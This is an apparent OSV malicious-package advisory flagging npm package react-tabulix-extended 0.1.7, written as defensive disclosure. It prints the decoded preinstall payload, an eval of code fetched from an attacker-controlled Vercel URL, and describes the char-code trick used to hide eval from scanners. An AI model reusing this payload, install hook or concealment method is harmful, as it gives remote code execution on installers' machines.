{"id":"MAL-2026-11040","summary":"Malicious code in react-tabulix-extended (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9e8df06223a5059cf4892135df7f8144e8857ad8c4dbf66d358691597badc36a)\npackage.json declares `preinstall: node./dist/index.d.js`, which fires automatically on `npm install`. The script contains a base64-encoded payload that decodes to `eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root1').then(r=\u003er.text()))`. The `eval` identifier is reconstructed from the char-code array [101,118,97,108] and invoked via `globalThis[tag](text)` to conceal the sink from static scanners. The result is arbitrary remote-code execution on the installer's machine at install time, with the payload served dynamically from an attacker-controlled Vercel endpoint so the executed code can change at any time.\n\n## Source: ossf-package-analysis (237a87c914ec4723f23c346fa62829c1e087c02bc181352880b9ea9a63420388)\nThe OpenSSF Package Analysis project identified 'react-tabulix-extended' @ 0.1.7 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-07-28T14:37:08.139439608Z","published":"2026-07-22T13:00:59Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-07-22T13:00:59Z","versions":["0.1.7"],"source":"ossf-package-analysis","sha256":"237a87c914ec4723f23c346fa62829c1e087c02bc181352880b9ea9a63420388","import_time":"2026-07-24T00:45:56.143558023Z"},{"sha256":"9e8df06223a5059cf4892135df7f8144e8857ad8c4dbf66d358691597badc36a","import_time":"2026-07-28T14:19:59.283856811Z","id":"IN-MAL-2026-010923","modified_time":"2026-07-28T13:36:57Z","versions":["0.1.7"],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-tabulix-extended/v/0.1.7"}],"affected":[{"package":{"name":"react-tabulix-extended","ecosystem":"npm","purl":"pkg:npm/react-tabulix-extended"},"versions":["0.1.7"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"dist/index.d.js","sha256":"6a19681ca31fb7be2fea7d7e0644fb5c64249dfb64a1cf2ad189a11f4cc05292","tlsh":"9df09e7e83d971b1e55418de06a89129b783d1f67e3c44b7f80f49d606a2c5583a11b0"}],"package_integrity":[{"filename":"react-tabulix-extended-0.1.7.tgz","hashes":{"sha1":"4255468e6125d49a30103dd5f0f2e8c3dfd83b76","sha512_sri":"sha512-B4JWkdcqZ9WZSlIOFaKPC/SvwsNG4zMFiQE3ZUwUdIG1A7b/VoUkrCynza9Ja9xH+mdoJspgTjX5cQAktwZIDg=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-tabulix-extended/MAL-2026-11040.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}